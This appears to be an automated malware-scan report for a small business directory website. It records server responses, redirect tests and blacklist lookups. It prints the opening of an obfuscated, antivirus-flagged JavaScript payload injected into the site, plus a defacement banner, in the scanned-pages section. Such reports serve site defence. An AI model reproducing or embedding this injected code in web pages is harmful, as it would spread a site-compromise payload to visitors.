Scanned pages/files
Request | Server response | Status |
http://www.worcestercountybusinesses.com/ | 200 OK Content-Length: 37714 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) var _1IO='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKPBTMfhCZslGaDRmblBHch5SSP9kC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9ASSP9EIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ3c0V2Z/8SbvNmLy9GdhN2c1ZmYvxWb0hmLpBXYv8iOwRHdodCI9AyYyNnLPBTMfpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9AyTwEzXgIXY2tjMwRGcsRXY9QnbpJHcyVGdmFmbv5ydvRmbpd3OxAHZwxGdh1DdulmcwVmcvZWZi52buc3bk5Wa31XfncSP5RXaslmYpNXa25 Antivirus reports:
Deface/Content modification. The following signature was found: ҳ̸Ҳ̸ҳ Hacked By Antonio hacker Sakit Hati ҳ̸Ҳ̸ <title> ҳ̸Ҳ̸ҳ Hacked By Antonio hacker Sakit Hati ҳ̸Ҳ̸ҳ </title> <!-- ҳ̸Ҳ̸ҳ Hacked By Antonio hacker Sakit Hati ҳ̸Ҳ̸ҳ --><script language="javascript" type="text/javascript">var _1IO='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKPBTMfhCZslGaDRmblBHch5 ...[37424 bytes skipped]... | ||
http://www.worcestercountybusinesses.com/test404page.js | 404 Not Found Content-Length: 37714 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _1IO='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKPBTMfhCZslGaDRmblBHch5SSP9kC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9ASSP9EIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ3c0V2Z/8SbvNmLy9GdhN2c1ZmYvxWb0hmLpBXYv8iOwRHdodCI9AyYyNnLPBTMfpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9AyTwEzXgIXY2tjMwRGcsRXY9QnbpJHcyVGdmFmbv5ydvRmbpd3OxAHZwxGdh1DdulmcwVmcvZWZi52buc3bk5Wa31XfncSP5RXaslmYpNXa25 Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: worcestercountybusinesses.com
Result:
GET / HTTP/1.1
Host: worcestercountybusinesses.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: worcestercountybusinesses.com
Referer: http://www.google.com/search?q=worcestercountybusinesses.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: worcestercountybusinesses.com
Referer: http://www.google.com/search?q=worcestercountybusinesses.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=worcestercountybusinesses.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://worcestercountybusinesses.com/
Result: worcestercountybusinesses.com is not infected or malware details are not published yet.
Result: worcestercountybusinesses.com is not infected or malware details are not published yet.